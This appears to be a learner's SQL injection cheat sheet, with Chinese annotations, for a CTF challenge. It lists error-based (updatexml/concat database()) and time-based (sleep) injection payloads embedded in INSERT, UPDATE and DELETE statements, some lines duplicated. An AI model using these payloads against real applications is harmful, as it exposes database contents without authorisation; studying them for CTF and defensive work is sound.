insert into users(id,username,password) values(1,'user','passwd');
insert into data1(id,name,year) values ('','attcaker' or sleep(2), 10);
delete from data1 where id=6 or updatexml(1,concat(0x7e,database()),0);
insert into users(id,username,password) values(1,'user','passwd');
insert into data1(id,name,year) values ('','attcaker' or sleep(2), 10);
delete from data1 where id=6 or updatexml(1,concat(0x7e,database()),0);
insert 插入
报错语法:(报错就能把数据库带出来)也能插进去。
insert into data1 (id,name,year) values ('','attacker' or updatexml(1,concat(0x7e,database()),0),10);
update:更新
报错语法:(报错就能把数据库带出来)
update data1 set year=11 or updatexml(1,concat(0x7e,database()),0) where id =7;
delete:删除(报错就能把数据库带出来)
delete from data1 where id =7 or updatexml(1,concat(0x7e,database()),0);
chall.tasteless.eu/level15/index.php
insert into (name,text) values (' ',' ');
'
#
\